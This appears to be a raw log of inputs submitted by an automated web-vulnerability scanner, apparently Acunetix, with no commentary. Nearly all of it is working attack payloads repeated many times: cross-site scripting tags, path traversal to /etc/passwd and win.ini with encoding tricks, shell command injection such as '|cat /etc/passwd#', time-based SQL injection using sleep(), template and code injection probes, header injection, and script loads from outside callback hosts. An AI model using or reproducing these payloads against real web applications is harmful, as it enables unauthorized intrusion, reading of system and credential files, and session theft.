
http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1))

^(#$!@#$)(()))******

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?926878></ScRiPt>

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

1

testasp.vulnweb.com

BMOZpREz'

1<ScRiPt >prompt(928918)</ScRiPt>

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

1<video><source onerror="javascript:prompt(989891)">

1

LafMVjib')

1

1

/etc/passwd

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(919740)"></g></svg>

1

1

1

CMcxmnuU'))

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<div style=width:expression(prompt(993992))>

1

1

-1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<iframe src='data:text/html

"

1

1

'

-1)

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<body onload=prompt(927709)>

1

1

1

-1))

||cat /etc/passwd

"

http://hit69HDTS4U00.bxss.me/

1

1

1

acunetix_wvs_invalid_filename

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(959502)>

E4FMFD2E'

1

1

${@print(md5(acunetix_wvs_security_test))}

1

&dir

CjADhHsi')

1

comments

1<img src=xyz OnErRor=prompt(952241)>

${@print(md5(acunetix_wvs_security_test))}\

http://www.acunetix.tst

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

f2r2OiuL'))

1

comments

1

'&dir&'

1

1<img/src=">" onerror=alert(916386)>

1

1

1

/\../\../\../\../\../\../\../etc/passwd

comments/.

1

1

"&dir&"

1

WEB-INF/web.xml

1

1

'"

1

1<ScRiPt%20>prompt(954664)</sCripT>

1

1

|dir

1

1

<!--

WEB-INF\web.xml

1

1

1'"()&%<ScRiPt >prompt(915284)</ScRiPt>

1

1&lt

'|dir

1

1

1

../../../../../../../../../../windows/win.ini

response.write(9742425*9242073)

1

"|dir

\xf6<img acu onmouseover=prompt(940187) //\xf6>

'"()&%<ScRiPt >prompt(924802)</ScRiPt>

1

&cat /etc/passwd&

'+response.write(9742425*9242073)+'

1

../../../../../../../../../../boot.ini

1_951976

1

1<input autofocus onfocus=prompt(992921)>

"+response.write(9742425*9242073)+"

1

'&cat /etc/passwd&'

../../../../../../../../../../windows/win.ini.jpg

1

<a href='http://www.acunetix.com'>website security</a>

SomeCustomInjectedHeader:injected_by_wvs

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

"&cat /etc/passwd&"

1

[url=http://www.acunetix.com]website security[/url]

SomeCustomInjectedHeader:injected_by_wvs

1

1

1_H41r0 <ScRiPt >prompt(905444)</ScRiPt>

................windowswin.ini

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

../../../../../../../../../../etc/passwd

1

1

1

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

1

1

|cat /etc/passwd#

1

1

${99502+99562}

../../../../../../../../../../etc/passwd.jpg

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

acu2705\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2705

1

1

1

'|'ld

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

acux9883\xc0\xbez1\xc0\xbcz2a\x90bcxuca9883

"|"ld

1&n965381=v913747

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1<ScRiPt >prompt(963201)</ScRiPt>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

1<script>prompt(979642)</script>

1

-1

1

WEB-INF/web.xml

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt >prompt(911335)</ScRiPt>

1

-1)

'

)

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?910399></ScRiPt>

testasp.vulnweb.com

1

WEB-INF\web.xml

"

1

!(()&&!|*|*|

'"()

-1))

1

/etc/passwd

1

1<ScRiPt >prompt(956762)</ScRiPt>

1

pU0AyXhM'

1

1

^(#$!@#$)(()))******

||cat /etc/passwd

1

1

1<video><source onerror="javascript:prompt(903120)">

1

7BDzBMBY')

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

&dir

1

1

1

IxP0taJI'))

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(942259)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'&dir&'

1

-1

'

1

1

1<div style=width:expression(prompt(907754))>

1

1

"&dir&"

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1)

"

1

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<iframe src='data:text/html

-1))

1

${@print(md5(acunetix_wvs_security_test))}

|dir

1<body onload=prompt(944637)>

1

1

1

acunetix_wvs_invalid_filename

'|dir

1

${@print(md5(acunetix_wvs_security_test))}\

aRsY67Ft'

file:///etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(990502)>

comments

1

http://hithu2ZDbJg6P.bxss.me/

1

1

1<img src=xyz OnErRor=prompt(949379)>

1

"|dir

comments

/\../\../\../\../\../\../\../etc/passwd

Z1pmx251')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<img/src=">" onerror=alert(926752)>

1

1

1

1

1

WEB-INF/web.xml

comments/.

1

1

1

1<ScRiPt%20>prompt(922052)</sCripT>

1

http://www.acunetix.tst

1

1

'"

WEB-INF\web.xml

1

aWQ6A7sZ'))

1

1

1

1&lt

1

<!--

1

1

../../../../../../../../../../windows/win.ini

1

1

1'"()&%<ScRiPt >prompt(933703)</ScRiPt>

1

1

\xf6<img acu onmouseover=prompt(992871) //\xf6>

1

'"()&%<ScRiPt >prompt(974543)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1

1<input autofocus onfocus=prompt(951670)>

1

1

1_973790

../../../../../../../../../../windows/win.ini.jpg

response.write(9530843*9172011)

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

'+response.write(9530843*9172011)+'

[url=http://www.acunetix.com]website security[/url]

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

"+response.write(9530843*9172011)+"

1_JevR0 <ScRiPt >prompt(902597)</ScRiPt>

&cat /etc/passwd&

1

1

1

1

................windowswin.ini

1

'&cat /etc/passwd&'

1

1

1

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

"&cat /etc/passwd&"

1

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

`cat /etc/passwd`

1

1

1

1

1

../../../../../../../../../../etc/passwd.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

acu5561\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5561

1

1

|cat /etc/passwd#

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1

${100066+99878}

acux5640\xc0\xbez1\xc0\xbcz2a\x90bcxuca5640

1

'|'ld

WEB-INF/web.xml

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt >prompt(937787)</ScRiPt>

1

-1)

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1some_inexistent_file_with_long_name%00.jpg

"|"ld

1

WEB-INF\web.xml

-1))

1&n979004=v917671

1<script>prompt(901660)</script>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

pQTJnRIO'

1

1

1

/etc/passwd

1<ScRiPt >prompt(919098)</ScRiPt>

testasp.vulnweb.com

1

1

1

'

1

zEjmS2hB')

1

)

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?943154></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

!(()&&!|*|*|

1

wpcyCXLb'))

1

"

1

1

1<ScRiPt >prompt(977517)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

^(#$!@#$)(()))******

||cat /etc/passwd

1

-1

1

1

1<video><source onerror="javascript:prompt(918679)">

'"()

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

&dir

'

-1)

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(907535)"></g></svg>

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'&dir&'

"

-1))

1

1

1<div style=width:expression(prompt(953775))>

file:///etc/passwd

1

1

1

1<iframe src='data:text/html

"&dir&"

1GXdz3Ce'

${@print(md5(acunetix_wvs_security_test))}

http://hitt84mGEQi1p.bxss.me/

1

1

acunetix_wvs_invalid_filename

/\../\../\../\../\../\../\../etc/passwd

1

1<body onload=prompt(963949)>

1

${@print(md5(acunetix_wvs_security_test))}\

|dir

92mOfEe2')

1

WEB-INF/web.xml

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(958946)>

1

comments

iCWE9gUP'))

'"

http://www.acunetix.tst

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments

WEB-INF\web.xml

1<img src=xyz OnErRor=prompt(993166)>

1

1

'|dir

1

1

<!--

comments/.

1<img/src=">" onerror=alert(939641)>

1

../../../../../../../../../../windows/win.ini

1<ScRiPt%20>prompt(964752)</sCripT>

1

1'"()&%<ScRiPt >prompt(986689)</ScRiPt>

1

1&lt

1

1

1

'"()&%<ScRiPt >prompt(902538)</ScRiPt>

../../../../../../../../../../boot.ini

"|dir

1

1

1

1

\xf6<img acu onmouseover=prompt(908436) //\xf6>

1_923913

1

1

1

../../../../../../../../../../windows/win.ini.jpg

response.write(9106001*9528480)

1

1<input autofocus onfocus=prompt(973013)>

&cat /etc/passwd&

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

'+response.write(9106001*9528480)+'

'&cat /etc/passwd&'

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

"+response.write(9106001*9528480)+"

1

[url=http://www.acunetix.com]website security[/url]

"&cat /etc/passwd&"

1

1

1

................windowswin.ini

SomeCustomInjectedHeader:injected_by_wvs

1_S8gxm <ScRiPt >prompt(947297)</ScRiPt>

1

cat /etc/passwd

1

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

`cat /etc/passwd`

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

|cat /etc/passwd#

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

acu8353\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8353

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'|'ld

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

"|"ld

${99663+100415}

1

acux7592\xc0\xbez1\xc0\xbcz2a\x90bcxuca7592

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1<ScRiPt >prompt(931053)</ScRiPt>

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF/web.xml

1

1<script>prompt(996655)</script>

-1

1

1&n926901=v948659

'

1some_inexistent_file_with_long_name%00.jpg

-1)

1<ScRiPt >prompt(918407)</ScRiPt>

WEB-INF\web.xml

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

"

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1))

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?961321></ScRiPt>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

1<ScRiPt >prompt(976511)</ScRiPt>

1

)

N6WhcTCR'

||cat /etc/passwd

testasp.vulnweb.com

1

1

1

/etc/passwd

1

1

CVwe7FiN')

!(()&&!|*|*|

1<video><source onerror="javascript:prompt(915484)">

&dir

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(929236)"></g></svg>

^(#$!@#$)(()))******

'"()

1auiqfmB'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<div style=width:expression(prompt(923099))>

1

1

'&dir&'

1

1

1

-1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<iframe src='data:text/html

"&dir&"

1

1

1

1

1<body onload=prompt(993040)>

1

-1)

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

'

|dir

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(922388)>

1

-1))

1

http://hitu7911XXqZq.bxss.me/

acunetix_wvs_invalid_filename

"

1

'|dir

1<img src=xyz OnErRor=prompt(995201)>

1

i7p7wS82'

1

1

file:///etc/passwd

${@print(md5(acunetix_wvs_security_test))}

comments

1

1

1

XNCxgBDx')

"|dir

1<img/src=">" onerror=alert(960793)>

/\../\../\../\../\../\../\../etc/passwd

comments

http://www.acunetix.tst

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

'"

YM5Rm7LO'))

1<ScRiPt%20>prompt(968405)</sCripT>

1

comments/.

<!--

WEB-INF/web.xml

1

1

1

1

1

1

1&lt

1

1

WEB-INF\web.xml

1'"()&%<ScRiPt >prompt(927815)</ScRiPt>

1

1

\xf6<img acu onmouseover=prompt(996523) //\xf6>

1

1

'"()&%<ScRiPt >prompt(987166)</ScRiPt>

../../../../../../../../../../windows/win.ini

1

1

1<input autofocus onfocus=prompt(909202)>

1_955101

1

1

<a href='http://www.acunetix.com'>website security</a>

1

../../../../../../../../../../boot.ini

1

1

[url=http://www.acunetix.com]website security[/url]

1

response.write(9724551*9661165)

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1_VmZmm <ScRiPt >prompt(946534)</ScRiPt>

1

&cat /etc/passwd&

'+response.write(9724551*9661165)+'

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9724551*9661165)+"

1

1

'&cat /etc/passwd&'

1

................windowswin.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

cat /etc/passwd

1

1

../../../../../../../../../../etc/passwd

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

`cat /etc/passwd`

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

${100483+99542}

1

acu5386\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5386

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

|cat /etc/passwd#

../../../../../../../../../../etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

acux1545\xc0\xbez1\xc0\xbcz2a\x90bcxuca1545

1&n926359=v911143

1

1

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

1

1

1

1<ScRiPt >prompt(914099)</ScRiPt>

"|"ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

WEB-INF/web.xml

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<script>prompt(919341)</script>

1

)

1

WEB-INF\web.xml

1<ScRiPt >prompt(955132)</ScRiPt>

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

!(()&&!|*|*|

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?955070></ScRiPt>

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1

'

1

1

1

1<ScRiPt >prompt(907037)</ScRiPt>

1

1

^(#$!@#$)(()))******

-1)

1

1

/etc/passwd

"

1<video><source onerror="javascript:prompt(936620)">

1

-1))

1

1

1

||cat /etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(951749)"></g></svg>

1

1

ngDirolH'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

1

UavUlHq7')

&dir

1<div style=width:expression(prompt(941471))>

'"()

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'&dir&'

1<iframe src='data:text/html

1

1

1

jwW0tUPI'))

1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<body onload=prompt(961957)>

1

1

-1

"&dir&"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(911159)>

http://hitiDESHjGYLR.bxss.me/

"

1

|dir

1

acunetix_wvs_invalid_filename

-1)

1

1

1

${@print(md5(acunetix_wvs_security_test))}

file:///etc/passwd

1<img src=xyz OnErRor=prompt(996799)>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

-1))

'|dir

comments

1

1<img/src=">" onerror=alert(941640)>

1

${@print(md5(acunetix_wvs_security_test))}\

1

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

'"

1<ScRiPt%20>prompt(916768)</sCripT>

comments

tsHqrqt6'

"|dir

1

1'"()&%<ScRiPt >prompt(965591)</ScRiPt>

<!--

WEB-INF/web.xml

1

1

1

z03mB82u')

comments/.

1&lt

WEB-INF\web.xml

1

'"()&%<ScRiPt >prompt(952176)</ScRiPt>

1

1

1

IBFn6lHK'))

1

1

\xf6<img acu onmouseover=prompt(910353) //\xf6>

response.write(9089712*9756543)

1

1

../../../../../../../../../../windows/win.ini

1

1

1_952495

1<input autofocus onfocus=prompt(953317)>

1

1

'+response.write(9089712*9756543)+'

../../../../../../../../../../boot.ini

1

&cat /etc/passwd&

1

1

<a href='http://www.acunetix.com'>website security</a>

1

"+response.write(9089712*9756543)+"

'&cat /etc/passwd&'

../../../../../../../../../../windows/win.ini.jpg

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1_0wJHM <ScRiPt >prompt(997082)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

cat /etc/passwd

1

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

................windowswin.ini

../../../../../../../../../../etc/passwd

`cat /etc/passwd`

1

SomeCustomInjectedHeader:injected_by_wvs

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

../../../../../../../../../../etc/passwd.jpg

'|'ld

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

${99151+99172}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

"|"ld

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

acu1649\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1649

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1some_inexistent_file_with_long_name%00.jpg

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1&n974793=v935416

acux5138\xc0\xbez1\xc0\xbcz2a\x90bcxuca5138

1

WEB-INF/web.xml

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1<ScRiPt >prompt(964520)</ScRiPt>

1

'

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

WEB-INF\web.xml

testasp.vulnweb.com

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

)

1

-1

1

1<script>prompt(980330)</script>

"

/etc/passwd

1

!(()&&!|*|*|

1

1

1

1

-1)

1<ScRiPt >prompt(942153)</ScRiPt>

1

1

^(#$!@#$)(()))******

||cat /etc/passwd

-1))

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?942055></ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

1<ScRiPt >prompt(908310)</ScRiPt>

1

1

g3ImNzRr'

&dir

1

1

1

1<video><source onerror="javascript:prompt(914279)">

PN4idfKY')

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(908676)"></g></svg>

1

1

'&dir&'

1

MR0DaFLn'))

1<div style=width:expression(prompt(951190))>

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"&dir&"

-1

1

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<iframe src='data:text/html

1

1

-1)

1

'

1

|dir

1

1

-1))

1<body onload=prompt(952634)>

1

"

1

file:///etc/passwd

http://hitWwp0LYGcpX.bxss.me/

1

'|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

${@print(md5(acunetix_wvs_security_test))}

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(938307)>

YE8dbj7B'

1

"|dir

acunetix_wvs_invalid_filename

1

/\../\../\../\../\../\../\../etc/passwd

1<img src=xyz OnErRor=prompt(910257)>

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

1

WYttfGoW'

1<img/src=">" onerror=alert(972498)>

1'"()&%<ScRiPt >prompt(988075)</ScRiPt>

'"

http://www.acunetix.tst

comments

1

1<ScRiPt%20>prompt(979781)</sCripT>

0ZTgU4mI')

1

WEB-INF/web.xml

1

'"()&%<ScRiPt >prompt(924709)</ScRiPt>

1&lt

comments

zxnnp1Dy'))

1

<!--

1

\xf6<img acu onmouseover=prompt(996127) //\xf6>

1

comments/.

1_993348

1

WEB-INF\web.xml

1

1

1

1<input autofocus onfocus=prompt(900040)>

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

../../../../../../../../../../boot.ini

1

1

1

response.write(9883767*9358262)

1

[url=http://www.acunetix.com]website security[/url]

'+response.write(9883767*9358262)+'

1

../../../../../../../../../../windows/win.ini.jpg

1

1_ejyay <ScRiPt >prompt(916870)</ScRiPt>

1

"+response.write(9883767*9358262)+"

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

................windowswin.ini

1

1

1

1

"&cat /etc/passwd&"

1

1

..\..\..\..\..\..\..\..\windows\win.ini

../../../../../../../../../../etc/passwd

1

1

1

1

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1

acu8777\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8777

1

`cat /etc/passwd`

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

${99852+99000}

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

../../../../../../../../../../etc/passwd.jpg

acux6092\xc0\xbez1\xc0\xbcz2a\x90bcxuca6092

|cat /etc/passwd#

1

1

1some_inexistent_file_with_long_name%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt >prompt(990724)</ScRiPt>

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1&n919956=v989940

